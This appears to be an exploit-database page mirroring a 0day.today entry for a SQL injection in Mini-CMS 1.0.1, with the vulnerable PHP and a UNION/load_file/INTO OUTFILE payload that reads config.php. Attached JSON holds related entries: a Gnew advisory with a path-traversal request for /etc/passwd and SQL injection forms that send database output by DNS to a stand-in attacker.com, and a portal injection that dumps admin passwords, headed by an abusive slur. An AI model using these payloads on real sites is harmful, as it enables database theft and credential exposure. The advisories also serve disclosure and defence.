Search...

Mini-CMS 1.0.1 (page.php id) SQL Injection Vulnerability

2009-08-10T00:00:00

ID 1337DAY-ID-5640
Type zdt
Reporter Ins3t
Modified 2009-08-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================
Mini-CMS 1.0.1 (page.php id) SQL Injection Vulnerability
========================================================


[+]--------------------------------------------------------------------------------------------------------------------[+]
[+]--------------------------------------------[Mini-CMS 1.0.1 SQL inlection]------------------------------------------[+]  
[+]--------------------------------------------------------------------------------------------------------------------[+]

-[INFO]----------------------------------------------------------------------------------------------------------------[+]
[+] Title:Mini-CMS 1.0.1 SQL inlection
[+] Autor: Ins3t
[+] Date:08.08.2009
[+]--------------------------------------------------------------------------------------------------------------------[+]

-[BUG INFO]------------------------------------------------------------------------------------------------------------[+]
[+] The vulnerability occurs due to insufficient filtering transferred database parameters. Password is not in the 
database, and in the config.php file.
[+] Conditions: magic_quotes_gpc = Off | full patch of file config.php
[+] Code vulnerable functions:

[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]
&lt;?php
$id = $_GET['id'];
database_connect();
$query = "SELECT * from content
          WHERE id = $id";                      &lt;------(BUG)
$error = mysql_error();
if (!$result = mysql_query($query)) {
    print "$error";
        exit;
        }

while($row = mysql_fetch_object($result)){
  $content = $row-&gt;text;
  print("$content");
        }
?&gt;
[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]

[+] Exploit: 

[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]

http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+

[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]




#  0day.today [2018-03-19]  #

JSON Vulners Source

Initial Source

{"hash": "8f91a834f45ce3e47386946533293dda4d6a151371c4f677713d22b3f5910272", "id": "1337DAY-ID-5640", "lastseen": "2018-03-20T01:20:48", "viewCount": 2, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "5d831b1fe73c73e9c8e54e7a1ecc588a", "key": "href"}, {"hash": "d655e95fc586dfcaf46ada7bf2113f8b", "key": "modified"}, {"hash": "d655e95fc586dfcaf46ada7bf2113f8b", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "59227d497839abd3834ac5800a16f5d1", "key": "reporter"}, {"hash": "07b8eff36492449826e43cffeab6cf44", "key": "sourceData"}, {"hash": "117514fd7838f014b499051f292cb3db", "key": "sourceHref"}, {"hash": "0724d8066459f422154f84ad18b4a5e3", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/5640", "description": "Exploit for unknown platform in category web applications", "title": "Mini-CMS 1.0.1 (page.php id) SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "c910e71c54dda417d57c612266210d677c2ede36abc2bd309a06fe9b81c9683f", "id": "1337DAY-ID-5640", "lastseen": "2016-04-20T01:30:15", "enchantments": {"score": {"value": 5.4, "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:P/", "modified": "2016-04-20T01:30:15"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d45d67533a5872258b5657b824da7ea8", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d655e95fc586dfcaf46ada7bf2113f8b", "key": "published"}, {"hash": "0724d8066459f422154f84ad18b4a5e3", "key": "title"}, {"hash": "59227d497839abd3834ac5800a16f5d1", "key": "reporter"}, {"hash": "b4e6588f351c1ac6f4e39fb3d7af581a", "key": "href"}, {"hash": "d655e95fc586dfcaf46ada7bf2113f8b", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "13cfbc3af4ac3a76ddfdb7d5cd10dba9", "key": "sourceHref"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/5640", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "Mini-CMS 1.0.1 (page.php id) SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "========================================================\r\nMini-CMS 1.0.1 (page.php id) SQL Injection Vulnerability\r\n========================================================\r\n\r\n\r\n[+]--------------------------------------------------------------------------------------------------------------------[+]\r\n[+]--------------------------------------------[Mini-CMS 1.0.1 SQL inlection]------------------------------------------[+] \r\n[+]--------------------------------------------------------------------------------------------------------------------[+]\r\n\r\n-[INFO]----------------------------------------------------------------------------------------------------------------[+]\r\n[+] Title:Mini-CMS 1.0.1 SQL inlection\r\n[+] Autor: Ins3t\r\n[+] Date:08.08.2009\r\n[+]--------------------------------------------------------------------------------------------------------------------[+]\r\n\r\n-[BUG INFO]------------------------------------------------------------------------------------------------------------[+]\r\n[+] The vulnerability occurs due to insufficient filtering transferred database parameters. Password is not in the \r\ndatabase, and in the config.php file.\r\n[+] Conditions: magic_quotes_gpc = Off | full patch of file config.php\r\n[+] Code vulnerable functions:\r\n\r\n[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]\r\n<?php\r\n$id = $_GET['id'];\r\ndatabase_connect();\r\n$query = \"SELECT * from content\r\n WHERE id = $id\"; <------(BUG)\r\n$error = mysql_error();\r\nif (!$result = mysql_query($query)) {\r\n print \"$error\";\r\n exit;\r\n }\r\n\r\nwhile($row = mysql_fetch_object($result)){\r\n $content = $row->text;\r\n print(\"$content\");\r\n }\r\n?>\r\n[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]\r\n\r\n[+] Exploit: \r\n\r\n[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]\r\n\r\nhttp://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+\r\n\r\n[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2009-08-10T00:00:00", "references": [], "reporter": "Ins3t", "modified": "2009-08-10T00:00:00", "href": "http://0day.today/exploit/description/5640"}, "lastseen": "2016-04-20T01:30:15", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "========================================================\r\nMini-CMS 1.0.1 (page.php id) SQL Injection Vulnerability\r\n========================================================\r\n\r\n\r\n[+]--------------------------------------------------------------------------------------------------------------------[+]\r\n[+]--------------------------------------------[Mini-CMS 1.0.1 SQL inlection]------------------------------------------[+] \r\n[+]--------------------------------------------------------------------------------------------------------------------[+]\r\n\r\n-[INFO]----------------------------------------------------------------------------------------------------------------[+]\r\n[+] Title:Mini-CMS 1.0.1 SQL inlection\r\n[+] Autor: Ins3t\r\n[+] Date:08.08.2009\r\n[+]--------------------------------------------------------------------------------------------------------------------[+]\r\n\r\n-[BUG INFO]------------------------------------------------------------------------------------------------------------[+]\r\n[+] The vulnerability occurs due to insufficient filtering transferred database parameters. Password is not in the \r\ndatabase, and in the config.php file.\r\n[+] Conditions: magic_quotes_gpc = Off | full patch of file config.php\r\n[+] Code vulnerable functions:\r\n\r\n[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]\r\n<?php\r\n$id = $_GET['id'];\r\ndatabase_connect();\r\n$query = \"SELECT * from content\r\n WHERE id = $id\"; <------(BUG)\r\n$error = mysql_error();\r\nif (!$result = mysql_query($query)) {\r\n print \"$error\";\r\n exit;\r\n }\r\n\r\nwhile($row = mysql_fetch_object($result)){\r\n $content = $row->text;\r\n print(\"$content\");\r\n }\r\n?>\r\n[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]\r\n\r\n[+] Exploit: \r\n\r\n[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]\r\n\r\nhttp://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+\r\n\r\n[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-19] #", "published": "2009-08-10T00:00:00", "references": [], "reporter": "Ins3t", "modified": "2009-08-10T00:00:00", "href": "https://0day.today/exploit/description/5640"}

{"zdt": [{"lastseen": "2018-03-31T15:38:12", "references": [], "description": "Apache Impala versions 2.7.0 through 2.8.0 suffers from an information disclosure vulnerability. It was noticed that a malicious process impersonating an Impala daemon could cause Impala daemons to skip authentication checks when Kerberos is enabled (but TLS is not). If the malicious server responds with 'COMPLETE' before the SASL handshake has completed, the client will consider the handshake as completed even though no exchange of credentials has happened.", "edition": 1, "reporter": "Cloudera", "published": "2017-07-11T00:00:00", "type": "zdt", "title": "Apache Impala 2.8.0 Authentication Bypass Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5640"], "modified": "2017-07-11T00:00:00", "href": "https://0day.today/exploit/description/28113", "id": "1337DAY-ID-28113", "sourceData": "CVE-2017-5640 Apache Impala (incubating) Information Disclosure\r\n\r\nVersions Affected:\r\nApache Impala (incubating) 2.7.0 to 2.8.0\r\n\r\nDescription:\r\nIt was noticed that a malicious process impersonating an Impala daemon\r\ncould cause Impala daemons to skip authentication checks when Kerberos\r\nis enabled (but TLS is not). If the malicious server responds with\r\naCOMPLETEa before the SASL handshake has completed, the client will\r\nconsider the handshake as completed even though no exchange of\r\ncredentials has happened.\r\n\r\nMitigation:\r\nUsers of the affected versions should apply the following mitigation:\r\nUpgrade to Apache Impala (incubating) 2.9.0\r\n\r\nCredit:\r\nThis issue was identified by the Cloudera Security team.\r\n\r\nReferences:\r\nhttps://issues.apache.org/jira/browse/IMPALA-5005\n\n# 0day.today [2018-03-31] #", "sourceHref": "https://0day.today/exploit/28113", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-20T11:17:18", "references": [], "description": "Gnew version 2013.1 suffers from file inclusion and remote SQL injection vulnerabilities.", "edition": 2, "reporter": "High-Tech Bridge", "published": "2013-10-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Gnew 2013.1 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-5640", "CVE-2013-5639"], "modified": "2013-10-02T00:00:00", "id": "1337DAY-ID-21318", "href": "https://0day.today/exploit/description/21318", "sourceData": "Product: Gnew\r\nVulnerable Version(s): 2013.1 and probably prior\r\nTested Version: 2013.1\r\nAdvisory Publication: August 28, 2013 [without technical details]\r\nVendor Notification: August 28, 2013\r\nPublic Disclosure: October 2, 2013\r\nVulnerability Type: PHP File Inclusion [CWE-98], SQL Injection [CWE-89]\r\nCVE References: CVE-2013-5639, CVE-2013-5640\r\nRisk Level: High\r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n \r\n------------------------------------------------------------------------\r\n-----------------------\r\n \r\nAdvisory Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Gnew, which can be exploited to execute arbitrary PHP code and pefrom SQL injection attacks against vulnerable application.\r\n \r\n1) PHP File Inclusion in Gnew: CVE-2013-5639\r\n \r\nVulnerability exists due to insufficient validation of user-supplied input passed via the \"gnew_language\" cookie to \"/users/login.php\" script before using it in \"include()\" function. A remote attacker can include and execute arbitrary local files on a vulnerable system via directory traversal sequence and URL-encoded NULL byte.\r\n \r\nThe following exploitation example below displays content of the \"/etc/passwd\" file:\r\n \r\nGET /users/login.php HTTP/1.1\r\nCookie: gnew_language=../../../etc/passwd%00;\r\n \r\n2) SQL Injection in Gnew: CVE-2013-5640\r\n \r\n2.1 The vulnerability exists due to insufficient filtration of \"friend_email\" HTTP POST parameter passed to \"/news/send.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe following exploitation example sends MySQL server version and database username to email address \"attacker (at) mail (dot) com [email concealed]\":\r\n \r\n<form action=\"http://[host]/news/send.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"send\" value=\"1\">\r\n<input type=\"hidden\" name=\"user_name\" value=\"username\">\r\n<input type=\"hidden\" name=\"user_email\" value=\"user (at) mail (dot) com [email concealed]\">\r\n<input type=\"hidden\" name=\"friend_email\" value=\"attacker (at) mail (dot) com [email concealed]\">\r\n<input type=\"hidden\" name=\"news_id\" value=\"-1' UNION SELECT version(),user() -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.2 The vulnerability exists due to insufficient filtration of \"user_email\" HTTP POST parameter passed to \"/users/register.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe exploitation example below outputs database username and MySQL server version into file \"/var/www/file.txt\". Successful exploitation requires that MySQL server has write access to the \"/var/www\" directory.\r\n \r\n<form action=\"http://[host]/users/register.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"register\" value=\"1\">\r\n<input type=\"hidden\" name=\"user_email\" value=\"' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.3 The vulnerability exists due to insufficient filtration of \"answer_id\" HTTP POST parameter passed to \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add_vote\" value=\"1\">\r\n<input type=\"hidden\" name=\"answer_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"hidden\" name=\"question_id\" value=\"1\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.4 The vulnerability exists due to insufficient filtration of \"question_id\" HTTP POST parameter passed to \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add_vote\" value=\"1\">\r\n<input type=\"hidden\" name=\"answer_id\" value=\"1\">\r\n<input type=\"hidden\" name=\"question_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.5 The vulnerability exists due to insufficient filtration of \"story_id\" HTTP POST parameter passed to \"/comments/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/comments/add.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_subject\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_text\" value=\"1\">\r\n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.6 The vulnerability exists due to insufficient filtration of \"story_id\" HTTP POST parameter passed to \"/comments/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/comments/edit.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"edit\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview_edited\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_subject\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_text\" value=\"1\">\r\n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.7 The vulnerability exists due to insufficient filtration of \"thread_id\" HTTP POST parameter passed to \"/posts/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/posts/add.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview\" value=\"1\">\r\n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\n2.8 The vulnerability exists due to insufficient filtration of \"thread_id\" HTTP POST parameter passed to \"/posts/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\n<form action=\"http://[host]/posts/edit.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"edit\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview_edited\" value=\"1\">\r\n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n \r\nSuccessful exploitation of vulnerabilities 2.3-2.8 requires that attacker is registered and logged-in. Registration is opened by default.\r\n \r\nVulnerabilities 2.1, 2.2 and 2.8 were discovered by Gjoko Krstic: http://packetstormsecurity.com/files/122771 on July 23, 2013. High-Tech Bridge Research Lab has discovered these vulnerabilities independently and publishes them as since the Vendor notification date they remain unpatched.\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21318"}, {"lastseen": "2018-01-06T01:05:36", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 2, "reporter": "Crackers_Child", "published": "2008-10-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Ayco Okul Portali (linkid) SQL Injection Vulnerability (tr)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-10-10T00:00:00", "id": "1337DAY-ID-3869", "href": "https://0day.today/exploit/description/3869", "sourceData": "===========================================================\r\nAyco Okul Portali (linkid) SQL Injection Vulnerability (tr)\r\n===========================================================\r\n\r\n\r\n**************************************************************************************\r\n\r\nAuthor : By Crackers_Child\r\nNote : Siz Pekeke Denen itler ; Siz ne turk ne de kurt olabilirsiniz. Siz Dupe Duz OROSPU cocuklarisiniz !\r\n\r\n**************************************************************************************\r\nScript : Ayco Okul Portali (tr) Sql injection Vulnerability\r\n\r\nhttp://www.aspindir.com/goster/5640\r\n\r\nPrice : 100 ?\r\n\r\n**************************************************************************************\r\n\r\nExploit : default.asp?tip=sollinkicerik&linkid=1+union+select+0,password,username,3+from+admin\r\n\r\n**************************************************************************************\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3869"}]}